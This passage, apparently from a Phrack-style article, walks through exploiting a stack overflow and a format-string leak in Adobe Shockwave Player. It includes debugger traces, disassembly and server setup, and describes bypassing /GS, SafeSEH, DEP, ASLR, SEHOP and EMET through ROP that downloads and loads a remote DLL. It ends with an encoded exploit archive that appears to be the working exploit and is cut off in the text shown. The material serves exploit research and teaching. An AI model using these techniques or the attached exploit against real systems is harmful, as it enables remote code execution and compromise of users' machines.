When provided with a large enough string as the first parameter to either
of these a buffer on the stack can be overflowed.

In order to craft a large string in Lingo, you can use their equivalent of
a for loop:


  buf = ""
  repeat with i = 0 to 10000
    buf = buf & "$"
  end repeat


Depending on how much data is provided, the fault that the debugger catches
may differ. Here's one such crash:


(63c.410): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=02f6bd10 ecx=00000000 edx=03790404 esi=000033a7
edi=02f6c248
eip=6fde9d0a esp=02f6b7ec ebp=02f6b7ec iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00210206
IML32!Ordinal1115+0xa:
6fde9d0a 81780454534146  cmp   dword ptr [eax+4],46415354h ds:002b:3773423a


OK, from the faulting instruction alone there is not much to deduce. The
call stack tells us a bit more:


0:005> kv
ChildEBP RetAddr  Args to Child
02f6b7ec 6f2277b8 37734236 02f6b810 6f2283b1 IML32!Ordinal1115+0xa
02f6b7f8 6f2283b1 02f6c248 06cf7024 00000000 DIRAPI+0x377b8
02f6b810 6f23a8ea 06cf7024 000033a7 02f6bd10 DIRAPI+0x383b1
02f6b82c 6f35ec15 06cf7024 02f6c248 02f6bd10 DIRAPI+0x4a8ea
02f6b848 6e73250b 06ced4bc 02f6c248 02f6bd10 DIRAPI+0x16ec15
02f6c114 42346942 69423569 37694236 42386942 Dynamiks+0x335e
02f6c118 69423569 37694236 42386942 6a423969 0x42346942
02f6c11c 37694236 42386942 6a423969 316a4230 0x69423569
02f6c120 42386942 6a423969 316a4230 42326a42 0x37694236
02f6c124 6a423969 316a4230 42326a42 6a42336a 0x42386942
02f6c128 316a4230 42326a42 6a42336a 356a4234 0x6a423969
02f6c12c 42326a42 6a42336a 356a4234 42366a42 0x316a4230
<snip>


The first thing that jumps out here is that there are what appear to be 5
fully intact frames before the stack is smashed. That tells us that the
destination buffer likely originates in the Dynamiks module.

We can also see that there are two stack pointers passed as arguments from
Dynamiks. Inspecting these we can see which was the destination buffer (we
could also deduce this from the frame pointers we see in the call stack...
i.e. it's unlikely to be 0x02f6c248 because the corruption began lower on
the stack):


0:005> dc 02f6c248 L8
02f6c248  73423573 37734236 42387342 74423973 s5Bs6Bs7Bs8Bs9Bt
02f6c258  31744230 42327442 74423374 35744234 0Bt1Bt2Bt3Bt4Bt5
0:005> dc 02f6bd10 L8
02f6bd10  41306141 61413161 33614132 41346141 Aa0Aa1Aa2Aa3Aa4A <- beginning
02f6bd20  61413561 37614136 41386141 62413961 a5Aa6Aa7Aa8Aa9Ab   of our buf


So, the stack buffer begins at 0x02f6bd10 and was passed from the Dynamiks
module into DIRAPI as argument 3. This can be seen by disassembling the
Dynamiks module and checking out the code before offset 0x335e:


(Dynamiks.x32: md5sum c6a9a75deb3da27682c267a7a2507e16, checksum 2a30eb,
Shockwave version 12.0.0.112)

0:005> ub Dynamiks+0x335e L6
Dynamiks+0x334f:
709e334f 8d8dfcfbffff    lea     ecx,[ebp-404h] <- vulnerable buffer
709e3355 51              push    ecx <------------ passed as third argument
709e3356 8d4f08          lea     ecx,[edi+8]
709e3359 51              push    ecx
709e335a 50              push    eax
709e335b ff5244          call    dword ptr [edx+44h]


In a real disassembler (IDA Pro) we can see how large that local variable
is by checking out the function's stack:


-00000404 var_404         db 1024 dup(?)  <--- vuln buffer, 1024 bytes
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 arg_0           dd ?
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?
+00000014 arg_C           dd ?
+00000018 arg_10          dd ?


Any string over 1024 bytes in size will corrupt var_4. Any guess as to what
var_4 is? Yep... say hello to the /GS mitigation:


(Dynamiks.x32: base address 0x10000000)

.text:100018A8                 mov     eax, ___security_cookie
.text:100018AD                 xor     eax, ebp
.text:100018AF                 mov     [ebp+var_4], eax


For those of you not familiar with /GS [12] it is a compiler option that is
on by default in any recent version of Visual Studio. It works by ... well,
skape said it much better than I in his Uninformed [13] article when
describing stack cookie initialization:

"At a high-level, this routine will take an XOR'd combination of the
current system time, process identifier, thread identifier, tick count, and
performance counter. The end result of XOR'ing these values together is
what ends up being the image file's security cookie."

The result of those operations is a 4-byte value that gets generated when
the module is loaded and then stored in its .data section. Any function the
compiler deems in need of some extra protection takes that value and XORs
it again with the current frame pointer (@ebp). It then stores it on the
stack as the first local variable. Upon function exit, the process checks
if it has been tampered with and, if so, throws an exception which usually
results in process termination.

Had we not caused an exception in IML32.dll the code would still return
back to the Dynamiks module and upon function exit (provided it doesn't
access any other invalid data long the way), the stack cookie check would
fail and the process would throw an exception and probably exit. Either
way, this is an obstacle we'll need to bypass.

We'll get back to this in a bit.


----[ 3.3 - Stack-based Memory Disclosure

In the course of testing the 3D Lingo methods, I was using a string
consisting of a large amount of the "%x" characters. I was lucky enough to
also be outputting objects to the Messages window via Lingo's trace()
function. In a few cases I saw some very interesting output, such as the
following:


 model("d03e682631e7c647ae08432631e18680fb8a9d03e6830680276b012d450d03e686
 9080b8e56b7420100c17eb9069056cd56908db3811038")


That was certainly not the name I gave that object when I called
newModel()...

Separating those %x values by spaces yielded:


 model("d03e68 6317e44 5ffad60 43 6317dcc 680fb8a9 d03e68 42 680276b0
 12d450 d03e68 69080b00 5711164 100c 17eb90 69056cd5 6908db38 1 1038")


At this point I was testing all of this on Windows XP and thus there was no
Address Space Layout Randomization to worry about. With that in mind, I'll
tell you that DIRAPI.dll has a preferred base address of 0x68000000 and
IML32.dll of 0x69000000. Looking at the output from the trace() call we can
clearly see that we're dealing with a format string vulnerability and for
each %x we provide, we're returned a 32 bit value off the stack.

As the code path to reach this vulnerability is deterministic, it can be
verified that the code pointers will always be the same on a non-ASLR'd
system. Thus, we can disclose the base addresses of at least two modules as
well as what look to be heap and stack pointers. We can verify the
addresses in a debugger:


0:008> !address 0xd03e68
    00c60000 : 00c60000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !heap -p -a 0xd03e68
    address 00d03e68 found in
    _HEAP @ 150000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        00c60018 20000 0000  [0b]   00c60020   100000 - (busy VirtualAlloc)
          ? <Unloaded_ame.dll>+ffff7
0:008> !address 6317e44
    06010000 : 06314000 - 0005b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 5ffad60
    05f00000 : 05f00000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 12d450
    00030000 : 0011e000 - 00012000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageStack
                    Pid.Tid  d1c.89c
0:008> !address 69080b00
    69000000 : 69001000 - 0008c000
                    Type     01000000 MEM_IMAGE
                    Protect  00000020 PAGE_EXECUTE_READ
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageImage
                    FullPath <snip>IML32.dll
0:008> ub 69056cd5 L1
IML32!Ordinal1754+0x12b3:
69056cd3 ffd5            call    ebp


One thing worth pointing out there is that the heap pointers originate from
an allocation of size 0x100000. This is due to the Smartheap slicing out
allocations from its own arena of that size.

Anyway, the take-away here is that I was able to leak an address from the
stack, two from the heap, and one from a module (IML32.dll).


------[ 3.3.1 - Undocumented Format Specifier

During my initial attempt at exploitation of these issues, I was having
trouble locating a reliable stack pivot within the one module I was able to
leak an address from (IML32.dll). After struggling with that problem for
about one week, I went back and began reverse engineering the root cause of
the memory disclosure and came across some undocumented functionality in
Lingo.

When provided with a "%v" format specifier, the code within DIRAPI.dll
replaces it with <%d %p>:


(DIRAPI.dll: base address 0x68000000,
md5sum fb5405cef8b2d6273c593477392cbc88, checksum 1c266b,
Shockwave version 12.0.0.112)

.text:68039FF2  case__v:
.text:68039FF2
.text:68039FF2    add     edi, 4          ; jumptable 68039EC7 case 35
.text:68039FF5    mov     [ebp+var_814], edi
.text:68039FFB    mov     edi, [edi]
.text:68039FFD    lea     esi, [ebp+var_810]
.text:6803A003    mov     byte ptr [ebp+var_404], 0
.text:6803A00A    call    sub_68039CA0
.text:6803A00F    test    eax, eax
.text:6803A011    jz      loc_6803A0EA
.text:6803A017    mov     eax, [ebp+arg_8]
.text:6803A01A    mov     ecx, [ebp+var_824]
.text:6803A020    mov     edx, [ebp+var_828]
.text:6803A026    push    eax
.text:6803A027    push    ecx
.text:6803A028    push    edi
.text:6803A029    push    edx
.text:6803A02A    call    sub_68030DB0    ; replaces %v with <%d %p> and
.text:6803A02A                              re-enters this func


By placing %v characters at specific locations in the input string I was
able to force a dereference of one of the stack values and retrieve two
32-bit integers from there, which yielded me an additional address within
a module. Specifically, I was able to leak an address within the
"Shockwave 3d Asset.x32" module which, it turned out, had a quite useful
code primitive I abused for a stack pivot.


--[ 4 - Exploit Delivery

The exploits discussed herein were progressively developed, with differing
approaches as obstacles were encountered. I've included explanations of all
of them to allow the reader to gain some insight into the process rather
than just delivering an explanation of what came to be the best solution.
In fact, the attached exploit code has not been "cleaned up", instead it
contains all the artifacts of a work-in-progress leading up to the final
solution.


----[ 4.1 - Server-side Architecture

As some of the exploits have different required architecture, I will cover
all the components I utilized throughout the exploitation process.


------[ 4.1.1 - web.py

I used web.py[14] to serve the following:

  * HTML pages that embedded the .dir files
  * Director files
  * A payload in one of the exploits

The included exploit has the following directory structure:


./
  |   craft_exploit.py
  |   main.py
  |
  |---web
  |       (web.py library code)
  |
  '---www
      |---dirs
      |       input.dir
      |       mem_disc.dir
      |       output.dir
      |
      |---html
      |       exploit.html
      |       index.html
      |
      '---payload
              runcalc.dll


It is also worth noting that I also added code to handle serving
gzip-encoded data to my main.py as I encountered some unreliability with
regard to web.py and its serving of large files.


------[ 4.1.2 - lighttpd

During one stage of the exploit development process, the code required a
WebDAV server to host a payload. For that, I used lighttpd[15] with the
following configuration:


        server.document-root = "/htdocs"
        server.port = 80
        server.username = "nobody"
        server.groupname = "nogroup"

        mimetype.assign = (".html" => "text/html",
                          ".application" => "application/x-ms-application")

        server.modules   = ( "mod_webdav",
                             "mod_alias",
                             "mod_accesslog")

        server.errorlog = "/logs/error.log"
        accesslog.filename = "/logs/access.log"

        webdav.activate = "enable"
        webdav.sqlite-db-name = "/lock/lighttpd.webdav_lock.db"



----[ 4.2 - The HTML

The HTML is pretty basic and consists of an index.html that embeds the .dir
file responsible for memory disclosure and an iframe that is dynamically
populated with the exploit.html page, which in turn embeds the crafted .dir
exploit for that particular client, on demand.

The iframe was required as it was noted that if one was not used, modules
in memory were loaded and unloaded at potentially different addresses if
the browser navigated away from one page, thus rendering the memory
disclosure unreliable.


----[ 4.3 - The Javascript

The index.html page contains the javascript functions responsible for the
following:

  * Receiving disclosed memory contents provided by the mem_disc.dir file
  * Receiving and parsing version, platform, and user agent information
  * POST-ing to itself in order to get such data back to main.py


----[ 4.4 - The Lingo

There are a couple of Lingo functions and properties that are exceptionally
friendly for the exploit developer. The following are used to determine how
to craft the malicious .dir file for a given client and then transport that
information to the server:

  * goToNetPage - function used to call javascript from the .dir
  * environmentPropList - property used to obtain platform, operating
  system information, and shockwave build version


----[ 4.5 - The Python

The craft_exploit.py handles construction of a custom .dir file per client
request. It receives leaked memory addresses, browser user agent, shockwave
version, and platform information from the aforementioned POST request.

The CraftExploit class defined within contains two class variables of note.
The self.int_mods list is populated with tuples containing the file offset
within the template .dir file and the value to inject. For example, the
first stack pivot used corresponds to offset 0x55AFC in the file. The
relevant code that replaces that value in the template .dir file looks like
this:


self.int_mods.append((0x55AFC, self.sw_3d+0x13e522))


The above will cause the resulting .dir file at offset 0x55AFC to contain a
pointer to the "Shockwave 3d Asset.x32" at offset 0x13e522.

The other notable class variable is self.str_mods which does much the same
thing, except that it is implemented as a dictionary. For example, in order
to ensure that a string value will exist at a given offset in the resulting
.dir file, one can utilize str_mods as so:


self.str_mods[0x536D0] = 'urlmon.dll\x00'


The contents of str_mods and int_mods are injected into the file using
CraftExploit's render method and then served to the target client via the
web server.


--[ 5 - Vulnerability Exploitation

The following sections will walk the reader through my exploit development
process against various configurations, bypassing mitigations as
encountered.


----[ 5.1 - Windows XP SP3/Firefox/Shockwave 11.6.5.635

This was the first exploit I wrote for this issue, and as I was developing
it on Windows XP SP3 I did not need to worry about ASLR (or even use the
memory disclosure vulnerability). This was written the day the bug was
discovered with the intent of exploiting the issue quickly, not reliably.

As the vulnerable code is protected by /GS, I opted to overwrite one of the
saved exception handlers on the stack. The executable was also compiled
with SafeSEH, for which bypasses has been covered extensively by others. In
short, I pointed the corrupted handler to an address inside a module that
did not make available the addresses of its exception handling functions
(for WinDBG users, I recommend checking out the narly[16] plugin that helps
determine which addresses are available for such a bypass). Thus, the
exception dispatcher was unable to determine if my corrupted pointer was
legitimate and would proceed to call it.

I then gained stack control and, after some ROP-ing, VirtualProtectEx'd the
stack and returned to it, executing a payload that simply ran
WinExec("calc.exe").

I relied on several things that make this exploit... dirty:

  * The modules I used to ROP with were getting their preferred base
  addresses, and thus I could easily ignore ASLR.
  * I used a system library, shell32.dll, for some primitives. This module
  is updated by Microsoft often and is not something to rely on.

So, to summarize, this exploit bypasses /GS, SafeSEH, DEP, and ignores ASLR
(but is more of a PoC than a proper exploit--and well, it's XP).


----[ 5.2 - Windows XP SP3/Firefox/Shockwave 11.6.8.638

About a day after I wrote the exploit for version 11.6.5.635 Adobe released
11.6.8.638. For completeness' sake, I added support to my exploit for what
was the latest version, using identical primitives, differing just in
location. See the attached exploit for details.


----[ 5.3 - Windows 7 x64/Firefox/Shockwave 12.0.0.112

When Adobe released version 12.0.0.112, I decided to utilize the memory
disclosure bug and exploit the vulnerabilities on a more modern operating
system, Windows 7.

This time, I used the stack memory disclosure to remove any reliance on
indeterminable memory addresses, thus bypassing ASLR. Unlike the prior
exploits, this version simply ROPs to a LoadLibraryA call and requests DLL
over a UNC path. I created a simple DLL that just calls WinExec("calc.exe")
upon load. Then, using lighttpd as described in 4.1.2, the file is served.


----[ 5.4 - Windows 7 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

The above exploit against Windows 7 x64 uses LoadLibraryA to load a
malicious payload off of a UNC share. EMET removes the ability to do this,
but it is easy enough to bypass, as detailed in the following section.


------[ 5.5.1 - Relevant 'EMET 5.0' Mitigations

The exploit for the same target with EMET 5.0 enabled simply calls
MoveFileA first to move the file from the remote WebDAV to the local
filesystem and then calls LoadLibraryA on the local file.

Protip: chattr +i the DLL file on the server so that the MoveFileA will
move it but won't be able to delete it afterwards, enabling subsequent
exploit attempts to work without a problem. You could also do this within
the lighttpd config.

Also, EMET implements a mitigation they call Export Address Table
Filtering[17] which monitors for read accesses to the exported function
addresses in key system DLL modules. However, the attached exploit
retrieves the addresses of functions by snagging a pointer via the
Shockwave modules' import section (which are not monitored by EMET), rather
than from the system DLL files themselves.


----[ 5.5 - Windows 8 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

Windows 8 introduces a number of exploit mitigations, thoroughly summarized
by Matt Miller and Ken Johnson during their Blackhat talk in 2012 [18]. The
most obtrusive mitigation that had to be overcome was SEHOP. SEHOP is
another mitigation intended to deter exploitation of SEH-based corruption.
As Microsoft describes [19]:

"The first step involves the insertion of a symbolic exception registration
record as the tail record in a thread's exception handler list. This step
occurs when a thread first begins executing in user mode. Since exception
registration records are always inserted at the head of the exception
handler list, the symbolic record is guaranteed to be the final exception
registration record.

The second step consists of walking the exception handler list at the time
that an exception is being dispatched to ensure that the symbolic record
can be reached and that it is valid. This step happens when the exception
dispatcher is notified that an exception has occurred in user mode. If the
symbolic record cannot be reached, the exception dispatcher can assume that
the exception handler list is corrupt and that an SEH overwrite may have
occurred. The exception dispatcher is then able to safely terminate the
process. If the symbolic record is found, the exception dispatcher is able
to proceed as it normally would and call each of the registered exception
handlers."

In order to bypass this mitigation, you pretty much need a memory
disclosure.  Luckily for me, the leaking of a stack address makes this
possible.

To demonstrate how such a mitigation is bypassed, the following will walk
through inspecting the exception chain before and after the exploit
corrupts it.

Firstly, once attached to the Firefox process, we can tell WinDBG to follow
child processes with the '.childdbg 1' command. Next we point Firefox to
the malicious server which will cause the Shockwave player to be invoked,
thus launching the plugin-container.exe process from Firefox:


0:029> .childdbg 1
Processes created by the current process will be debugged
0:029> g
ModLoad: 70b30000 70b63000   C:\Windows\SysWOW64\shdocvw.dll
<snip>
ModLoad: 09c70000 09c76000   plugin-container.exe
Executable search path is:
ModLoad: 00fa0000 00fa6000   plugin-container.exe
ModLoad: 772f0000 77447000   ntdll.dll
ModLoad: 76620000 76750000   C:\Windows\SysWOW64\KERNEL32.DLL
ModLoad: 74f10000 74fb6000   C:\Windows\SysWOW64\KERNELBASE.dll
<snip>
ModLoad: 74980000 74989000   C:\Windows\SysWOW64\CRYPTBASE.dll
ModLoad: 74920000 74971000   C:\Windows\SysWOW64\bcryptPrimitives.dll
(834.950): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000003 ecx=a1500000 edx=00000000 esi=00000000
edi=007e0000
eip=77390545 esp=007bf854 ebp=007bf880 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
77390545 cc              int     3


In order to inspect the untainted exception chain, we can ask WinDBG to
next break upon loading of the Dynamiks.x32 module using:


1:032> sxe ld:dynamiks
1:032> g
(740.1f0): Unknown exception - code 000006ba (first chance)
ModLoad: 709e0000 70c81000   C:\Users\user\AppData\LocalLow\Adobe\Shockwave
Player 12\xtras\download\AdobeSystemsIncorporated\Dynamiks\Dynamiks.x32
eax=00000000 ebx=00800000 ecx=00000000 edx=00000000 esi=00000000
edi=fe9bf000
eip=77e20fe8 esp=0061a944 ebp=0061a99c iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00200206
ntdll!ZwMapViewOfSection+0xc:
77e20fe8 c22800          ret     28h
1:032> bp !Dynamiks+0x335b
1:032> g
Breakpoint 0 hit
eax=0506ba80 ebx=00000000 ecx=0061ca6c edx=71407620 esi=050003a0
edi=0061ca64
eip=709e335b esp=0061c074 ebp=0061c938 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Dynamiks+0x335b:
709e335b ff5244        call  dword ptr [edx+44h]  ds:002b:71407664=713debe0


We can view the current exception chain with the !exchain command:


1:032> !exchain
0061ef40: USER32!_except_handler4+0 (775f3991)
0061efa4: USER32!_except_handler4+0 (775f3991)
0061f000: ntdll!KiUserCallbackExceptionHandler+0 (77e22e60)
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


For those unfamiliar with the above formatted information, the first number
is the address on the stack of the SEH record. For example, for the first
entry we can inspect the record and verify that the first 32 bit value
points to the next SEH record address on the stack, and that the second 32
bit value points to the code responsible for handling the exception:


1:032> dd 0061ef40 L2
0061ef40  0061efa4 775f3991
1:032> u poi(0061ef40+4) L4
USER32!_except_handler4:
775f3991 8bff            mov     edi,edi
775f3993 55              push    ebp
775f3994 8bec            mov     ebp,esp
775f3996 83ec14          sub     esp,14h


Prior to corruption, the SEH record chain consists of the following stack
locations, terminated by -1:


0061ef40->0061efa4->0061f000->0061f0fc->0061f858->0061f8a8->0061f8c8->
ffffffff


At this point, we also know the address of the destination buffer that will
be overflowed (see section 3.2):


1:032> dd @esp+0x8 L1
0061c07c  0061c534


We can calculate how much data is required to be copied from that address
to reach the first SEH record on the stack:


1:032> ? 0061ef40-0061c534
Evaluate expression: 10764 = 00002a0c


Now comes the fun part. The exception chain validation that occurs when
ntdll!KiUserExceptionDispatcher doesn't care how many entries are in the
chain. What this means is that an attacker has some flexibility with
regard to how they choose to bypass the checks. For example, the stack
corruption could be used to link the first exception handler
(USER32!_except_handler4) all the way to the last one
(ntdll!FinalExceptionHandler) by modifying the first's *next pointer.
Another option (and the one that I chose) is to craft a fake SEH record,
link a prior record to yours, and link yours to an existing one located
further down the stack. To illustrate this, the below shows the state of
the exception chain after attempting to step over the call that causes the
stack-based buffer overflow:


1:032> p
(740.1f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=0061c534 ecx=00000000 edx=00e5eff4 esi=00002af8
edi=0061ca6c
eip=71439d0a esp=0061c010 ebp=0061c010 iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00010206
IML32!Ordinal1115+0xa:
71439d0a 81780454534146 cmp dword ptr [eax+4],46415354h ds:002b:3773423a=??
1:032> !exchain
0061ef40: Shockwave_3d_Asset!CIFXString::SetCodePage+49122 (70f2e522)
0061ef50: 41414141
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


Note that now the SEH chain consists of:


0061ef40->0061ef50->0061f0fc->0061f858->0061f8a8->0061f8c8->ffffffff


What has occured is the first SEH record has been corrupted to point into
the "Shockwave 3d Asset.x32" module (this is our stack pivot--more on this
later) and it's *next pointer has been modified to point to a new address
on the stack (calculated using the stack memory disclosure).

The second record shown above is a fake one that my exploit crafts to
re-link the chain. Its *next pointer has been crafted to point to 0061f0fc
which is a valid SEH record that existed prior to the corruption. Note that
its code pointer was simply set to 0x41414141, which is weakly validated by
ntdll's exception dispatcher to ensure it is not located on the stack.

At this stage, the SEH chain will pass SEHOP validation and the first
record's code will be called. This can be verified in the debugger:


1:032> bp Shockwave_3d_Asset!CIFXString::SetCodePage+49122
1:032> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=70f2e522 edx=77e23105 esi=00000000
edi=00000000
eip=70f2e522 esp=0061ba5c ebp=0061ba7c iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Shockwave_3d_Asset!CIFXString::SetCodePage+0x49122:
70f2e522 8b4d0c     mov   ecx,dword ptr [ebp+0Ch] ss:002b:0061ba88=0061ef40



------[ 5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations

EMET 5.0 implements many mitigations that were submitted as 'defensive
security research' to the Microsoft BlueHat Prize Contest (over $250,000
was awarded). The software is still in Tech Preview, but I was curious as
to how difficult it would be to bypass. I was also a bit irked that my
prior exploits required a WebDAV server. So, in this version of the exploit
I decided to remove that requirement. This was accomplished by ROP-ing a
call to LoadLibraryA whereby I loaded the urlmon.dll module. More
specifically, I returned to LoadLibraryA+0x5 to skip over the EMET hook:


1:039> u KERNEL32!LoadLibraryA L2
KERNEL32!LoadLibraryA:
76ccf864 e92f0932f9      jmp     6fff0198
76ccf869 837d0800        cmp     dword ptr [ebp+8],0

1:039> u 6fff0198
6fff0198 684bedeeeb      push    0EBEEED4Bh
6fff019d 60              pushad
6fff019e 9c              pushfd
6fff019f 54              push    esp
6fff01a0 e80bd32a05      call    emet+0x4d4b0 (7529d4b0)
6fff01a5 9d              popfd
6fff01a6 61              popad
6fff01a7 83c404          add     esp,4


By ensuring we land at LoadLibraryA+0x5 and we control @ebp, this EMET hook
is trivially bypassed. Microsoft is aware of how limited this hook is, and
they even cite Phrack in their blog post[20].

Once urlmon.dll was loaded, I had to deal with EMET's 'Caller' mitigation,
which does the following:

"EMET will make sure that when a critical function is reached, it is
reached via a "call" instruction rather than a "ret" instruction. This is a
very useful mitigation and breaks many ROP gadgets."[20]

I also had to deal with the 'SimExecFlow' mitigation:

"This mitigation tries to detect ROP gadgets following a call to a critical
function. It works by emulating a specified number of instructions at the
return address of the caller of a critical function."[20]

Both of the above mitigations would interfere with my calling
GetProcAddress to retrieve the address of URLDownloadToFileA. They were
bypassed by returning into the middle of a module's existing call to
GetProcAddress, thus EMET could not tell that it was ROP-ed to or that it
was an illegitimate call:


.text:7A25CD4A 00C                 push    eax             ; hModule
.text:7A25CD4B 010                 call    ds:GetProcAddress
.text:7A25CD51 008                 mov     [esi+18h], eax
.text:7A25CD54 008                 cmp     eax, edi
.text:7A25CD56 008                 jnz     short loc_7A25CD6D
.text:7A25CD6D     loc_7A25CD6D:
.text:7A25CD6D
.text:7A25CD6D 008                 mov     eax, edi
.text:7A25CD6F 008                 pop     edi
.text:7A25CD70 004                 pop     esi
.text:7A25CD71 000                 retn
.text:7A25CD71     sub_7A25CD20    endp


By returning directly to the code at 0x7A25CD4A, @eax already contained the
result from LoadLibraryA("urlmon.dll\x00"), and because I could predict
stack addresses using the memory leak it was easy enough to ensure there
was a pointer to the string "URLDownloadToFileA\x00" for the call to
GetProcAddress and also that @esi was pointing to a stack address under
control. Thus, I was able to get the address of the function without a
problem.

Then, I called URLDownloadToFileA to drop the payload to a default writable
local directory (C:\Users\Public) and then returned to LoadLibraryA and
loaded the code.


--[ 6 - Future Work

I began developing support for process continuation/continuation of
execution/whatever it's being called these days. It should be fairly easy
to ensure the plugin-container.exe doesn't crash hard, but would require
reversing the interaction between this process and the firefox.exe parent.


--[ 7 - Conclusion

This article wasn't intended to share anything novel... any competent
exploit writer could have implemented the attached exploit. I just wanted
to share a walkthrough from bug discovery to reliable exploit so that
readers can get a feel for what the process is like these days.


--[ 8 - Greets

Thanks to navs, sohlow, raid, & hoodlum for their insight and valuable
discussions.


--[ 9 - References

[1] http://community.corest.com/~gera/InsecureProgramming
[2] http://virus.wikia.com/wiki/29A
[3] http://www.uninformed.org
[4] http://helpx.adobe.com/shockwave/kb/shockwave-player-faq.html
[5] http://www.adobe.com/products/shockwaveplayer.html
[6] https://wiki.mozilla.org/NPAPI
[7] http://www.adobe.com/products/director.html
[8] http://cansecwest.com/csw11/Adobe_Shockwave-AaronPortnoy
    _LoganBrown.pptx
[9] http://www.microquill.com/smartheap/index.html
[10] http://www.j4u2.com/jht/bio.html
[11] http://helpx.adobe.com/director/topics/scripting-dictionary.html
[12] http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx
[13] http://uninformed.org/index.cgi?v=7&a=2&p=5
[14] http://webpy.org/
[15] http://www.lighttpd.net/
[16] https://code.google.com/p/narly/
[17] http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-
     exploitation-of-seh-overwrites-with-sehop.aspx
[18] http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller
     _Exploit_Mitigation_Slides.pdf
[19] http://blogs.technet.com/b/srd/archive/2010/07/28/announcing-the-
     upcoming-release-of-emet-v2.aspx
[20] http://blogs.technet.com/b/srd/archive/2012/07/24/emet-3-5-tech-
     preview-leverages-security-mitigations-from-the-bluehat-prize.aspx


--[ 10 - Exploit

begin 644 exploit.tar.bz2
M0EIH.3%!629364!,H#H!S([_____________________________________
M________Y!X>0)?:S2"*D4A6M39E$IL:UJ*BE%4DV95K%5(I0*%*`"JM@`U4
M@6QED:4$@`4"J`````H````````T`````"@`4``````!8`WON`'"````````
M```````````````````````2```````````````````````5D!$`!H`#T```
M%F`%``````.AHRP`````````"TT:0`+:95L*MK`P8``````````P`'KKYYR7
M6,88`````````-Z=`\L\JF;&Q@`````````6/2'O#T\3$````WI4O>AXR=,&
MUZ!5ZN'D],8>A/#P.CQGH*$\>'H1N>45#/`.\Y[JH)JKP>@"-SQ1%-7@#P]W
MM*@@8\!>7'JJ[,#I<'D3[:@GWOLJI0`QX#SW>`8J`:3P'C</*BB0`&\#GMSP
M\HD`J`PX'>./`Y2)%4H8>"[V/`'4E2`U'@WCF`\I44`QX+R.`>2I"F/#><8#
MU*C4KP7D<!ZH&D>%X3@/5`&'A>VX#U:RC#@\PX/54#4>%[6<!ZE(&B>%Y.H>
MDI24#'A>N*/*I2*4,>+V9P`\52&HX>8X!Z*H&>#O:$YX>D\OL]N><NS[Z2@B
M*<B@!0%``6.[9Z(?0&<+V9RKK[F?9A\"^V.`$8<QP`C@1E`6"#`1@C'I1N'K
M#@)@=,</1N'K#AZS@@P+![;9QZ9X/6T[V[.YXO,SGE7'J1>.7EX#UM'*5<^`
M`````````!/=H^^KU`#SX``````````(:?&>JI6.>``!$```````G7'G0W'@
M`4``4``````@QP3<``*````````GIWJ*W@``````````1WI[XWGP````````
M``0;SS<\``*``H`````)\N/%W/``$(```````0.?+ZYX````%`````"/E'/$
M;@4W+2'3.K:``$<'T%<Y````````HJ@````````:``8H@``````9&]LRP#K'
M/6=\`````3Y<>$\`````<>CGA,]Z`````,Q.>^L/@``'T`'P#O$;@)```"/0
MX*N`"@22`1J/)N`!0``1ZZO)O`````@,=&Y0```0.';E```*CTX\MX```"'M
MND]5GEY(R`&@3(\/-Q>4*!H`8#GHS@`"@!!@,```,]4\^OG?```!`;B.```.
M?$=Y'AT``"!NE5P'0``CTYZ4\'H``'ASU5<```.>AWJ+P```=Y.]]L7P#X@`
M'QH<\"\``'H/#O`N```'!N!<``<&XI&>F<(PC"86"P,88$Q,Y7M````N>>'N
M8-"@\5J```!<#K941<```!.<^6[UUMA`V@```1Q[WKO+MIW(`+0```)ES5U[
